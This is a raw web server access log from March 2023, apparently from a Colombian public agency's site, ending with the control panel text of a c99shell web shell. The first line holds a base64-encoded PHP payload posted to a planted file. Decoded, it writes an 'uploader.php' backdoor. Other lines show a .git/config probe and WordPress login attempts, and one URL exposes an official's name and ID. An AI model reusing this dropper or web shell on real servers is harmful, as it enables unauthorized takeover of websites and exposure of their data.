140.238.48.138 - - [26/Mar/2023:23:33:11 -0500] "POST //wp-admin/css/colors/blue/blue.php?wall=CiAgJGZjID0gJ1BEOXdhSEFnWldOb2J5QW5QSEJ5WlQ0bkxuQm9jRjkxYm1GdFpTZ3BMaUpjYmlJdUp6eGljaTgrUEdadmNtMGdiV1YwYUc5a1BTSndiM04wSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaVgxOGlQanhwYm5CMWRDQnVZVzFsUFNKZklpQjBlWEJsUFNKemRXSnRhWFFpSUhaaGJIVmxQU0pWY0d4dllXUWlQand2Wm05eWJUNG5PMmxtS0NSZlVFOVRWQ2w3YVdZb1FHTnZjSGtvSkY5R1NVeEZVMXNuWDE4blhWc25kRzF3WDI1aGJXVW5YU3dnSkY5R1NVeEZVMXNuWDE4blhWc25ibUZ0WlNkZEtTbDdaV05vYnlBblQwc25PMzFsYkhObGUyVmphRzhnSjBWU0p6dDlmVDgrJzsKICAkZm4gPSAndXBsb2FkZXIucGhwJzsKICBpZiggZnVuY3Rpb25fZXhpc3RzKCdmaWxlX3B1dF9jb250ZW50cycpICkgewogICAgZmlsZV9wdXRfY29udGVudHMoJGZuLCBiYXNlNjRfZGVjb2RlKCRmYykpOwogIH1lbHNlewogICAgQHRvdWNoKCRmbik7CiAgICBpZighJGZvID0gZm9wZW4oJGZuLCAnYScpKSB7CiAgICAgIGVjaG8gJ2Vycm9yJzsKICAgICAgZXhpdDsKICAgIH07CiAgICBmd3JpdGUoJGZvLCBiYXNlNjRfZGVjb2RlKCRmYykpOwogICAgZmNsb3NlKCRmbyk7CiAgfQogIGlmKCBmaWxlX2V4aXN0cygkZm4pICkgewogICAgZWNobyAnYURyaXY0JzsKICAgIGV4aXQ7CiAgfQ== HTTP/1.1" 404 1134
192.168.175.240 - - [26/Mar/2023:23:33:16 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [26/Mar/2023:23:33:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [26/Mar/2023:23:34:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [26/Mar/2023:23:34:52 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [26/Mar/2023:23:35:16 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [26/Mar/2023:23:35:27 -0500] "GET / HTTP/1.1" 200 319
192.168.175.240 - - [26/Mar/2023:23:36:16 -0500] "GET / HTTP/1.1" 200 4720
66.249.79.115 - - [26/Mar/2023:23:36:44 -0500] "-" 408 -
172.22.2.4 - - [26/Mar/2023:23:35:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [26/Mar/2023:23:37:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [26/Mar/2023:23:35:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57935
192.168.175.240 - - [26/Mar/2023:23:38:16 -0500] "GET / HTTP/1.1" 200 4720
34.147.47.195 - - [26/Mar/2023:23:38:36 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
201.245.192.253 - - [26/Mar/2023:23:38:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [26/Mar/2023:23:39:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [26/Mar/2023:23:39:52 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [26/Mar/2023:23:40:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43451
201.245.192.253 - - [26/Mar/2023:23:40:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43458
192.168.175.240 - - [26/Mar/2023:23:40:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [26/Mar/2023:23:41:16 -0500] "GET / HTTP/1.1" 200 4720
34.147.47.195 - - [26/Mar/2023:23:42:09 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
192.168.175.240 - - [26/Mar/2023:23:42:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [26/Mar/2023:23:42:35 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [26/Mar/2023:23:40:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [26/Mar/2023:23:43:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [26/Mar/2023:23:41:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53914
201.245.192.253 - - [26/Mar/2023:23:43:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
66.249.79.111 - - [26/Mar/2023:23:43:51 -0500] "-" 408 -
186.29.171.62 - - [26/Mar/2023:23:44:15 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
192.168.175.240 - - [26/Mar/2023:23:44:16 -0500] "GET / HTTP/1.1" 200 4720
186.29.171.62 - - [26/Mar/2023:23:44:22 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
186.29.171.62 - - [26/Mar/2023:23:44:24 -0500] "POST /appsia/controlador HTTP/1.1" 200 7783
186.29.171.62 - - [26/Mar/2023:23:44:25 -0500] "POST /appsia/controlador HTTP/1.1" 200 5239
186.29.171.62 - - [26/Mar/2023:23:44:27 -0500] "GET /appsia/controlador?comando=ingresarMenuPrincipal&id=7720064&funcionario=HECTOR+FABIO+RODRIGUEZ+DEVIA&desde=7720064&hasta=7720064&version=7720064&accion=Regresar HTTP/1.1" 200 5437
172.22.2.4 - - [26/Mar/2023:23:44:51 -0500] "GET /BLA/boletinlegal/.git/config HTTP/1.1" 404 1018
216.245.221.92 - - [26/Mar/2023:23:44:52 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [26/Mar/2023:23:45:16 -0500] "GET / HTTP/1.1" 200 4720
34.147.6.178 - - [26/Mar/2023:23:45:52 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
192.168.175.240 - - [26/Mar/2023:23:46:16 -0500] "GET / HTTP/1.1" 200 4720
52.167.144.167 - - [26/Mar/2023:23:46:29 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2023%2F HTTP/1.1" 200 10548
52.151.201.131 - - [26/Mar/2023:23:46:50 -0500] "GET /images/jardines-verticales_optimized.jpeg HTTP/1.1" 200 138197
192.168.175.240 - - [26/Mar/2023:23:47:16 -0500] "GET / HTTP/1.1" 200 4720
66.249.79.128 - - [26/Mar/2023:23:47:43 -0500] "-" 408 -
192.168.175.240 - - [26/Mar/2023:23:48:16 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [26/Mar/2023:23:46:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [26/Mar/2023:23:48:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
186.30.73.106 - - [26/Mar/2023:23:49:03 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 888406
172.22.2.4 - - [26/Mar/2023:23:47:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52720
192.168.175.240 - - [26/Mar/2023:23:49:16 -0500] "GET / HTTP/1.1" 200 4720
186.30.73.106 - - [26/Mar/2023:23:49:44 -0500] "GET /BLA/resoluciones/AUTOS%202014/5405.pdf HTTP/1.1" 200 591007
216.245.221.92 - - [26/Mar/2023:23:49:52 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [26/Mar/2023:23:50:16 -0500] "GET / HTTP/1.1" 200 4720
35.204.179.234 - - [26/Mar/2023:23:50:51 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
192.168.175.240 - - [26/Mar/2023:23:51:16 -0500] "GET / HTTP/1.1" 200 4720
185.119.81.99 - - [26/Mar/2023:23:52:07 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.99 - - [26/Mar/2023:23:52:08 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
192.168.175.240 - - [26/Mar/2023:23:52:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [26/Mar/2023:23:53:16 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [26/Mar/2023:23:53:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
172.22.2.4 - - [26/Mar/2023:23:52:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [26/Mar/2023:23:54:16 -0500] "GET / HTTP/1.1" 200 4720
207.46.13.213 - - [26/Mar/2023:23:54:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4436.pdf HTTP/1.1" 200 825792
216.245.221.92 - - [26/Mar/2023:23:54:52 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [26/Mar/2023:23:53:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57935
192.168.175.240 - - [26/Mar/2023:23:55:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [26/Mar/2023:23:56:16 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [26/Mar/2023:23:57:16 -0500] "GET / HTTP/1.1" 200 4720
66.249.79.128 - - [26/Mar/2023:23:58:00 -0500] "-" 408 -
192.168.175.240 - - [26/Mar/2023:23:58:16 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [26/Mar/2023:23:58:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [26/Mar/2023:23:59:16 -0500] "GET / HTTP/1.1" 200 4720
40.77.167.211 - - [26/Mar/2023:23:59:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/2649.pdf HTTP/1.1" 304 -
186.84.22.68 - - [26/Mar/2023:23:59:28 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 888406
186.84.22.68 - - [26/Mar/2023:23:59:30 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
216.245.221.92 - - [26/Mar/2023:23:59:52 -0500] "HEAD / HTTP/1.1" 200 -

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.078 ]--